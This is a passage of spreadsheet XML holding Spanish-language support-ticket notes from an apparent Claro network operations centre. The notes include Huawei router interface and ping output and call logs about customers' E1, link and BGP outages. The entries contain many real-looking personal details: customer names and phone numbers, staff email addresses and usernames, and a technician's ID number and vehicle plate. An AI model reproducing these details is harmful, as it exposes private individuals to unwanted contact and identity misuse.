GE0/0/5(V)                    UP      DOWN     VIRTUALPORT
LOOP5                         UP      UP(S)    MONITOREO DEL CNOC
NULL0                         UP      UP(S)    HUAWEI, AR SERIES, NULL0 INTERFAC
                                               E
VLANIF1                       UP      UP       LAN CLIENTE
WLAN-BSS0                     UP      UP       HUAWEI, AR SERIES, WLAN-BSS0 INTE
                                               RFACE
WLAN-BSS7                     UP      UP       HUAWEI, AR SERIES, WLAN-BSS7 INTE
                                               RFACE
WLAN0/0/0                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/
                                               0 INTERFACE
WLAN0/0/1                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/
                                               1 INTERFACE
[ID1035040]PING -A 190.86.190.214 8.8.8.8
  PING 8.8.8.8: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=1 TTL=116 TIME=31 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=2 TTL=116 TIME=31 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=3 TTL=116 TIME=30 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=4 TTL=116 TIME=31 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=5 TTL=116 TIME=31 MS
  --- 8.8.8.8 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 30/30/31 MS
[ID1035040]PING -A 190.86.190.213 8.8.8.8
WARNING: THE SPECIFIED SOURCE ADDRESS IS NOT A LOCAL ADDRESS, THE PING COMMAND WILL NOT CHECK THE NETWORK CONNECTION.
  PING 8.8.8.8: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=1 TTL=116 TIME=31 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=2 TTL=116 TIME=31 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=3 TTL=116 TIME=31 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=4 TTL=116 TIME=31 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=5 TTL=116 TIME=31 MS
  --- 8.8.8.8 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 31/31/31 MS
[ID1035040]PING -A 192.168.1.1 8.8.8.8
  PING 8.8.8.8: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=1 TTL=116 TIME=30 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=2 TTL=116 TIME=31 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=3 TTL=116 TIME=31 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=4 TTL=116 TIME=30 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=5 TTL=116 TIME=30 MS
  --- 8.8.8.8 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 30/30/31 MS
[ID1035040]PING -A 192.168.1.1 8.8.8.8
  PING 8.8.8.8: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=1 TTL=116 TIME=31 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=2 TTL=116 TIME=30 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=3 TTL=116 TIME=31 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=4 TTL=116 TIME=30 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=5 TTL=116 TIME=31 MS
  --- 8.8.8.8 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 30/30/31 MS</t>
  </si>
  <si>
    <t>F4588809</t>
  </si>
  <si>
    <t>INFORMA CLIENTE EVELYN ALFARO 55884373 QUE EL E1 ESTA ACTIVO, INDICA QUE EL DÍA DE AYER NO LOGRÓ REALIZAR LLAMADAS HACIA UN NÚMERO, INDICA QUE NO SABE CUAL NÚMERO ERA, SI ERA CLARO O TIGO O SI ERA MOVIL A FIJO.  INDICA QUE SÓLO FUE A ESE NÚMERO Y NO LO PUEDE BUSCAR YA QUE ELLOS LLAMAN A MUCHOS NÚMEROS, PERO INDICA QUE YA NO SE HA PRESENTADO EL PROBLEMA. SE LE INDICA AL CLIENTE QUE POSIBLEMENTE EL NÚMERO NO ESTABA EN FUNCIONAMIENTO Y POR ESO NO COMPLETÓ LA LLAMADA. CLIENTE INDICA QUE SI VUELVE A PRESENTAR EL PROBLEMA ANOTARÁ LOS DETALLES. AUTORIZA EL CIERRE DEL CASO. ID DE LLAMADA: 1001059355, 1001054588</t>
  </si>
  <si>
    <t>F4588811</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE HUGO CASARES 77374753 - 22486674 PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE ENVIA CORREO  NUEVAMENTE CONSULTANDO A CLIENTE DE LOS PERMISOS
RE: F4588811 / SD113188 / GDN 222011900 / LACTEOS DEL CORRAL, S.A. DE C.V. / SIN SERVICIO / SAGN
¿
MICROSOFT OUTLOOK
VIE 03/06/2022 13:24
NO SE PUDO ENTREGAR A ESTOS DESTINATARIOS O GRUPOS: PERLA.ESTRADA@CLARO.COM.GT EL BUZÓN DE CORREO DEL DESTINATARIO ESTÁ LLENO Y NO PUEDE ACEPTAR MENSAJES POR EL MOMENTO. INTENTE REENVIAR EL MENSAJE MÁS TARDE O PÓNGASE EN CONTACTO CON EL DESTINATARIO DIRECTAMENTE.
¿
MICROSOFT OUTLOOK
VIE 03/06/2022 13:24
NO SE PUDO ENTREGAR A ESTOS DESTINATARIOS O GRUPOS: JUANM.CARDONA@CLARO.COM.GT EL BUZÓN DE CORREO DEL DESTINATARIO ESTÁ LLENO Y NO PUEDE ACEPTAR MENSAJES POR EL MOMENTO. INTENTE REENVIAR EL MENSAJE MÁS TARDE O PÓNGASE EN CONTACTO CON EL DESTINATARIO DIRECTAMENTE.
¿
MICROSOFT OUTLOOK
VIE 03/06/2022 13:24
NO SE PUDO ENTREGAR A ESTOS DESTINATARIOS O GRUPOS: RAULE.ALVAREZ@CLARO.COM.GT EL BUZÓN DE CORREO DEL DESTINATARIO ESTÁ LLENO Y NO PUEDE ACEPTAR MENSAJES POR EL MOMENTO. INTENTE REENVIAR EL MENSAJE MÁS TARDE O PÓNGASE EN CONTACTO CON EL DESTINATARIO DIRECTAMENTE.
MONICA YIREH CASTILLO POON
BUENAS TARDES ESTIMADO,
QUEDAMOS ATENTOS A SU CONFIRMACIÓN DE PERMISOS RESPECTO AL CORREO ANTERIOR.
SALUDOS,</t>
  </si>
  <si>
    <t>CLIENTE DESPUES DEL REINICIO VALIDA LAS CONEXIONES DEL ASMI HACIA LA PBX, COMENTA QUE LO CONECTO EN EL PUERTO E1 E INDICA QUE SE QUITO LA ALM POR UN MOMENTO PERO NUEVAMENTE SE ENCENDIO, CLIENTE APLICO RESET A LA PBX PERO SIGUE SIN LEVANTAR EL SERVICIO. SE LE INDICA QUE SE ENVIARA PERSONAL TECNCIO A VERIFICAR EL EQUIPO Y CERTIFICAR PARA VALIDAR QUE LA PBX NO ESTUVIERA DAÑADA, CLIENTE QUEDA ENTERADO. SOLICITA QUE SE ENVIE DATOS DEL PERSONAL A CORREO CON NUMERO DE IDENTIFICACION, NOMBRE Y EQUIPO QUE VAN A UTILIZAR PARA TRAMITAR LOS PERMISOS, SE CONFIRMA LA DIRECCION FISICA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4588816</t>
  </si>
  <si>
    <t>SE VALIDARA GRAFICAS A NIVEL DE CLARO SERVICIO SE ENCUENTRA OPERATIVO Y ESTABLE.</t>
  </si>
  <si>
    <t>F4588822</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO MONDRAGON 99934791 ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 1001077326 - 10010477817</t>
  </si>
  <si>
    <t>F4588826</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAMUEL VILLALTA 70667941 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001166185 - 1001166361</t>
  </si>
  <si>
    <t>SE VALIDA QUE AUN NO LE HAN LLAMADO, SE PROCEDE A CONTACTAR A SAMUEL VILLALTA AL 70667941 ID 1001254697 COMENTA QUE NO LE HAN REPORTADO INCIDENCIA YA FUNCIONA Y SOLICITA EL CIERRE DEL TICKET Y FALLA SE NOTIFICA A LA GESTORA MONICA.CASTILLO PARA EL CIERRE VIA SKYPE</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAMUEL VILLALTA 70667941 ## INDICA QUE SIGUEN REALIZANDO PRUEBAS- PIDE VALIDAR EL DIA DE MAÑANA 11 AM ##VIVO</t>
  </si>
  <si>
    <t>F4588833</t>
  </si>
  <si>
    <t>CLIENTE REALIZA PRUEBAS Y VERIFICA QUE NO HAY PROBLEMAS CON EL E1- COMENTA QUE ALGUIEN REPORTO QUE TENIA PROBLEMAS PROBLEMAS Y POR ESO REPORTO----- CLIENTE REALIZA PRUEBAS Y CONSULTA SI HAY PROBLEMAS PERO TODO OK ###SE PROCEDE ALC IERRE#
PATRICIA TOMASINO-25269089  S</t>
  </si>
  <si>
    <t>PATRICIA TOMASINO-25269089  SE TIENE EN LINEA- ##
1001058061
COLA:
NOMBRE: A: 0050325269089
NÚMERO: 0050325269089
DURACIÓN: 0:00:30
ESTADO: CONECTADA
DETALLES: 0050325269089
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 3/06/2022 10:38:04</t>
  </si>
  <si>
    <t>F4588834</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JOHANA DIAZ AL 88280584 INDICA QUE AUN ESTA CAIDO EL SERVICIO || SE CONTACTA A GESTOR Y SE DEJA EN LIENA CON CLIENTE **
ID 1001059258 - 1001060290
**</t>
  </si>
  <si>
    <t>F4588844</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE NELY AL 88918041 SOLICITA QUE SE LE LLAME EN 15 MIN YA QUE ANDA ALMORZANDO **
ID 1001094392
**</t>
  </si>
  <si>
    <t>F4588846</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE IVETH GUILLEN AL  25662020 EXT 5223/5300 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001095542 - 1001095767
**</t>
  </si>
  <si>
    <t>F4588857</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BETZABE ALVARADO AL 87461310 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001100608
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIA  78882373 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001082403</t>
  </si>
  <si>
    <t>F4588865</t>
  </si>
  <si>
    <t>DESPUÉS DE LA CORRECCIÓN DE LA POLICY, ENLACE OK, CLIENTE HARÁ SUS PRUEBAS INTERNAS SE DEBE VALIDAR SERVICIO A LAS 15:00 HORAS.</t>
  </si>
  <si>
    <t>F4588875</t>
  </si>
  <si>
    <t>CLIENTE INGRID RUIZ 58369212 COMENTA QUE EN EL LAS LLAMADAS ENTRANTES ESCUCHA RUIDO CAUSANDO QUE A VECES SE PIERDA EL AUDIO. SE REALIZA LLAMADA Y SE ESCUCHA AIRE EN LA LINEA. INDICA QUE EL PROBLEMA HA IDO AUMENTANDO YA QUE NO LOGRA ESCUCHAR A SUS CLIENTES. SE CORRE PRUEBA DE CALIDAD EN MSAN Y NO SE OBSERVA INCREMENTO DE ERRORES. CLIENTE SOLICITA VISITA TÉCNICA. ID DE LLAMADA: 1001065010</t>
  </si>
  <si>
    <t>CLIENTE INGRID RUIZ 58369212 REALIZA PRUEBAS DE LLAMADA Y VALIDA QUE EL E1 SE ENCUENTRA OPERATIVO Y YA NO ESTÁ PRESENTANDO INCONVENIENTES, AUTORIZA EL CIERRE DEL CASO. ID: 1001114979</t>
  </si>
  <si>
    <t>F4588880</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SE PROCEDE AL CIERRE DEL INCIDENTE, ESTIMADOS CC VALIDAR MEDIANTE SD, GRACIAS.
ASUNTO: SOLUCIÓN BGP ESTABLECIDA ID1028233 || STREAM GLOBAL SERVICES EL SALVADOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>ACTUALMENTE EN LLAMADA CON CLIENTE SR. DANIEL CÁCERES 77982884  SOLICITA REALIZAR UNA REUNION VIA TEAMS CON SU DEPARTAMENTO DE IT, ACTUALMENTE ESTA GENERANDO EL LINK...</t>
  </si>
  <si>
    <t>F4588893</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A ROBERTO GARCÍA/CLIENTE, ÉSTE INDICA QUE ESTABA RECIBIENDO ALGUNAS INSTRUCCIONES DE GESTIÓN N1, SE LE CORTÓ LA LLAMADA; SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, VÍA TELEFÓNICA APOYA FRANCISCO QUEZADA/GESTOR, EN TRIPARTITA ÉSTOS, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE CON LAS GRAFICAS SOLICITADAS-
SEGUIMIENTO A TICKET 1131914</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 6 DE JUNIO DE 2022 12:31
PARA: YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; PABLO MIGUEL ERNESTO JUAREZ HERNANDEZ &lt;PABLOM.JUAREZ@CLARO.COM.GT&gt;; ROBERTO GARCIA &lt;ROBERTO.GARCIA@ASSECOSOL.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; ROBERTO GARCIA &lt;ROBERTO.GARCIA@ASSECOSOL.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SEGUIMIENTO A TICKET 1131914
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROBERTO GARCIA 55853360  MENCIONA QUE  AUN NO HA RECIBIDO EL CORREO
-ID 1001557922</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE INDICA QUE ELLOS REALIZAN PRUEBAS DESPUES DE SU FIREWALL(EQUIPOS INTERNOS) SE LE INDICA DE LAS PRUEBAS CONECTANDOSE DIRECTO A ROUTER INDICA QUE ESTA DE ACUERDO UNICAMENTE INDICA QUE ESTARAN VALIDANDO QUIEN EN PR PUEDE APOYAR Y ESTARAN DEVOLVIENDO LA LLAMADA POR MEDIO DE CALL CENTER---</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROBERTO GARCIA AL 55853360 INDICA QUE ENVIO CORREO CON PRUEBAS PERO NO HA TENIDO RESPUESTA || SE NOTIFICA A GESTOR**
ID 1001107513
**</t>
  </si>
  <si>
    <t>**SE LLAMA NUEVAMENTE A CLIENTE ROBERTO GARCIA AL 55853360 SE LE INDICA QUE NO SE HA RECIBIDO CORREO QUE SI PUEDE REENVIARLO NUEVAMENTE Y SE LE BRINDA CORREO DE GESTOR Y CNOCCA@CLARO.COM.GT CLIENTE INDICA QUE LO REENVIARA || SE NOTIFICA A GESTOR **
ID 1001109485
**</t>
  </si>
  <si>
    <t>F4588908</t>
  </si>
  <si>
    <t>SE  ENVIA  CORREO A CLEINTE CON DATOS  TECNICOS
E: ENLACE CAÍDO DE DA-NI-PLANTA-HORTIFRUTI-MANAGUA ID: 4584285
¿
JONATHAN EDUARDO TEZEN MEJIA
BUENAS TARDES ESTIMADO CLIENTE
GUSTO EN SALUDARLE  ,  LE  ADJUNTO DATOS DE TÉCNICO  SOLICITADOS  SEGÚN CONVERSACIÓN ,
NOMBRE :  MARIO DAVID ARRIZA LOPEZ
IDENTIFICACION : 401-181081-0006U
VEHICULO :  ZUSUKI PLACA M321392
QUEDO  ATENTO  A SU RESPUESTA ,  AGRADEZCO SU APOYO CON ACCESOS</t>
  </si>
  <si>
    <t>|| SE LE ENVIA CORREO A WALMART INDICANDO QUE PERSONAL NO LE PERMITEN TRABAJAR HASTA NO RECIBIR UN CURSO DE SEGURIDAD || SE MANTIENE EN ETAPA PC HASTA QUE PERMITAN TRABAJOS
RE: ENLACE CAÍDO DE DA-NI-PLANTA-HORTIFRUTI-MANAGUA ID: 4584285</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 CONTESTA EL SEÑOR MALAQUIAS E INDICA QUE YA EL SEÑOR JOSE MARTINEZ SALIO A BUSCAR AL TECNICO O SI NO QUE CONSULTEN POR EL || SE NOTIFICA A GESTOR **
ID 1001123584
**</t>
  </si>
  <si>
    <t>F4588910</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAVIER MEDRANO 78542115 ENVIA DIRECTAMENTE A BUZON, SE INTENTARA LUEGO
-ID 1001094320</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JAVIER MEDRANO AL 78542115  INDICA QUE SIGUE IGUAL CON EL MISMO INCONVENIENTE || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 1001121355
**</t>
  </si>
  <si>
    <t>F4588927</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A BRYAN ALVIZURES/CLIENTE 42617499; SE LE INDICA ENLACE OK, ASÍ LO CONFIRMA, PIDE SE VALIDE SERVICIO A LAS 15:00 HORAS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESCARLETH MANZANERO 41753805  MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001139988</t>
  </si>
  <si>
    <t>F4588932</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A BRYAN ALVIZURES/CLIENTE 42617499; SE LE INDICA ENLACE OK, ASÍ LO CONFIRMA, PIDE SE MANTENGA EN MONITOREO PARA LAS 15:00 HORAS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BRYAN ALVIZURES AL 42617499 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO *
ID 1001157535
**</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 52025829 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; TIEMPO DE MONITOREO HA FINALIZADO.</t>
  </si>
  <si>
    <t>F4588949</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE JAIRO GOMEZ 78551587 PERO NO CONTESTA Y ENVÍA A BUZÓN, SE INTENTARA EN UNOS INSTANTES
1001102928
1001103029
1001103069</t>
  </si>
  <si>
    <t>F4588954</t>
  </si>
  <si>
    <t>F4588955</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MILTON LÓPEZ-35153471 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001148588</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MILTON LÓPEZ-35153471  ## DESTINO INDICA: ESTE NUMERO NO EXISTE EN LA RED TELEFONICA#
 MILTON LÓPEZ-35153471
1001097099
COLA:
NOMBRE: A: 35153471
NÚMERO: 35153471
DURACIÓN: 0:00:06
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 35153471
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALE
S: 3/06/2022 12:31:46
1001097322
COLA:
NOMBRE: A: 35153471
NÚMERO: 35153471
DURACIÓN: 0:00:10
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NÚMERO SIN ASIGNAR (CÓDIGO 01 DE CAUSA ISDN)/404:SIP - NO SE ENCUENTRA]
DETALLES: 35153471
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 3/06/2022 12:32:03
A</t>
  </si>
  <si>
    <t>CLIENTE INIDCA QUE EL REPORTE QUE HACE ES QUE AL LLAMAR AL GDN NO ENTRA LA LLAMADA Y AL TRATAR DE  SALIR HA TENIDO COMPLICACIONES- ##SE LE COMENTA A CLIENTE QUE ES NECESRAIO QUE RELICE PRUEBAS ##CLIENTE  REALIZARA- PIDE SE LLAME EN 10 MINUTOS##
1001100111
COLA:
NOMBRE: A: 23836000
NÚMERO: 23836000
DURACIÓN: 0:02:57
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 23836000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 3/06/2022 12:44:12</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 35153471 PARA SEGUIMIENTO, NO CONTESTA; EN GDN 23836000 SE HABLÓ CON ALEJANDRA/RECEPCIÓN ME COMUNICA CON MILTON LÓPEZ/CLIENTE; SE PIDE APOYO A GESTIÓN AE VÍA SKYPE, VÍA TELEFÓNICA CONTESTA ULIL/GESTOR AE; ÉSTE INDICA QUE CONTESTARÁ GESTOR AE ASIGNADO, CLIENTE CORTA LLAMADA.</t>
  </si>
  <si>
    <t>SE LLMA A ALCIENTE AL GN  23836000  || MILTON LÓPEZ-35153471
1001100111
COLA:
NOMBRE: A: 23836000
NÚMERO: 23836000
DURACIÓN: 0:00:37
ESTADO: CONECTADA
DETALLES: 23836000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 3/06/2022 12:41:50</t>
  </si>
  <si>
    <t>F4588963</t>
  </si>
  <si>
    <t>CLIENTE MILTON PEREZ 35153471  REALIZA PRUEBAS DE LLAMADAS Y VALIDA QUE EL E1 ESTÁ FUNCIONANDO CORRECTAMENTE. AUTORIZA EL CIERRE DEL CASO.
ID DE LLAMADA: 1001102988</t>
  </si>
  <si>
    <t>F4588979</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARTIN REGAS 59237349  MENCIONA QUE EL PROBLEMA ES CON EL WIFI, SE VALIDA CON GESTOR QUE CLARO NO LE BRINDA WIFI
CLIENTE INDICA QUE ESTARA VALIDANDO SU RED INTERNA
-ID 1001101787</t>
  </si>
  <si>
    <t>F4588982</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE FRANKLIN 94556052 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001143847</t>
  </si>
  <si>
    <t>F4588993</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCISCO SUAZO 8739-6320 SE LE INFORMA A CLIENTE QUE DEBE DE REVISAR SU RED INTERNA INDICA QUE ESTARA REVISANDO **
ID 1001098557
**</t>
  </si>
  <si>
    <t>F4588994</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE TECNICO COMENTA  QUE CLIENTE YA SE RETIRA DE LAS INSTALACIONES, SE LLAMA A CLIENT WERNER, COMENTA QUE  SE COORIDNE PARA EL DIA DE MAÑANA , A LAS 8:00 AM, SE PASA FALLA A PC
1001155593
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4818
DURACIÓN: 0:02:15
ESTADO: CONECTADA
DETALLES: 4818
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 3/06/2022 15:56:05</t>
  </si>
  <si>
    <t>SE LLAMA A CLEINTE WERNER SE LE CONFIRMA QUE SERVICIO RESTABLECE QUEDA ENTERADO Y AGRADECE LA ATENCION, BRINDA CIERRE DE FALLA
1001184376
COLA:
NOMBRE: A: 42377599
NÚMERO: 42377599
DURACIÓN: 0:01:02
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 42377599
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 3/06/2022 17:58:42</t>
  </si>
  <si>
    <t>F4589011</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE JENNER, SE VALIDAN PRUEBAS DE PRIMER NIVEL Y SERVICIO NO RESTABLE, POR LO QUE SE COORDINARA VISITA.
DATOS:
ENNER 22696570
DIRECCION: G101, 9A CALLE 1-58 ZONA 4 CIUDAD CAPITAL
PERMISOS: NO
HORARIO: 7:00   A 19:00 HORAS.
1001137117
COLA:
NOMBRE: DE: LUVY ESAU SANDOVAL MATEO
NÚMERO: 7753
DURACIÓN: 0:05:53
ESTADO: DESCONECTADO [ÚLTIMO PARTICIPANTE DE CONFERENCIA]
DETALLES: 7753
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 3/06/2022 14:56:40</t>
  </si>
  <si>
    <t>EN TRIPARTITA CON TECNICO Y CLIENTE EN PR JENNER 58523258  INDICARON QUE AHORA COMPARTIRAN SU UBICACION CON TECNICO, A LA ESPERA QEU PERMITAN INGRESO A TECNICO
1001157982
COLA:
NOMBRE: A: ERITO FERNANDO TECU XITUMUL
NÚMERO: 6078
DURACIÓN: 0:02:11
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 6078
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 3/06/2022 16:07:05</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 45787911 PARA SOLICITARLE TELS DE PR, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE, ADICIONAL SE LE PIDE APOYO VÍA CORREO:
ASUNTO: RE: G101 - CAÍDO SERVICIO DE ENLACE CLARO - CON ID 629100003T</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 45787911 NO RESPONDE, ESTAMOS A  ESPERA QUE CL RESPONDA CORREO O SE INTENTARA LUEGO **
ID 1991125843
**</t>
  </si>
  <si>
    <t>F4589012</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE IRVIN GUZMAN SE REALIZAN VERIFICACIÓN DE CONEXIONES DEL CPE Y ETX 1, ENLACE CONTINUA CAIDO, SE APLICO RESET SOBRE CPE Y ETX 1  INCIDA CLIENTE QUE LED DE ETX 1 EN PWR SE ENCUENTRA EN ROJO, SE VERIFICO QUE PUERTO DE FIBRA ESTA BIEN AJUSTADO, SE ENVIARA A PERSONAL TECNICO A VERIFICAR MEDIO PARA REVISAR PUERTO DEL ETX 1300 HACIA ETX 1 Y VERIFICAR CERTIFICAR MEDIO. LOG VIA CIC
UBICACION: INTERNET.- 3 CALLE "A" 29-55 RESIDENCIALES ATLANTICO ZONA 18
IRVIN GUZMAN
HORARIO DE 2 A 6 PM
LUNES A VIERNES
TELEFONO 51175956 IRVIN GUZMAN SEGUIMIENTO PARA SOLICITAR PERSMISOS POR ESTA VÍA.
LOG VIA CIC
RESULTADO: CONTESTADA
NOMBRE: 51175956
NÚMERO: 51175956
INICIO: HOY, 12:03
FIN: HOY, 12:26
DURACIÓN: 22:59
ID DE LLAMADA: 1001409207</t>
  </si>
  <si>
    <t>SE ENTABLA COMUNICACION CON RENE CAMEROS  QUIEN INFORMA QUE SE ENCUENTRA LLEGANDO AL PUNTO REMOTO, A LA ESPERA QUE LLEGUE EL CLIENTE  1001599830
SE ENTABLA COMUNICACION CON IRVIN GUZMAN CLIENTE 51175956 , QUIEN INFORMA QUE VAN EN RUTA HACIA CLIENTE APROXIMADAMENTE EN UNO 30MINUTOS ESTARAN LLEGANDO AL PUNTO REMOTO, SE MANTIENE LA ETAPA EN PC
CID 1001600798</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE IRVIN GUZMAN AL  51175956 INDICA QUE EL VA DE CAMINO AL SITIO TAMBIEN Y SOLICITA QUE SE LE LLAME CUANDO LOS TECNICOS ESTEN AHI || SE NOTIFICA A GESTOR **
ID   1001575472
**</t>
  </si>
  <si>
    <t>F4589015</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 00 525551745299 PARA CONSULTAR COMPORTAMIENTO DEL SERVICIO, VALIDANDO LO DICHO POR GESTIÓN N1, ME DEJAN DEMASIADO TIEMPO EN ESPERA, SE DEBE INTENTAR MÁS TARDE, ADICIONAL SE CONSULTA A GESTIÓN N1 VÍA SKYPE SI COMPARTIRÁN PRUEBAS A CLIENTE VÍA CORREO.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, ESTIMADOS CC VALIDAR MEDIANTE SD. GRACIAS
ASUNTO: RE: SOLICITUD DE SOPORTE ::: DHL LATO I GLOBAL FORWARDING - LATO-CR-DGF-LUC-POZ-01 - CONTR0001639011OC - LINKDOWN|| IMDHG006701</t>
  </si>
  <si>
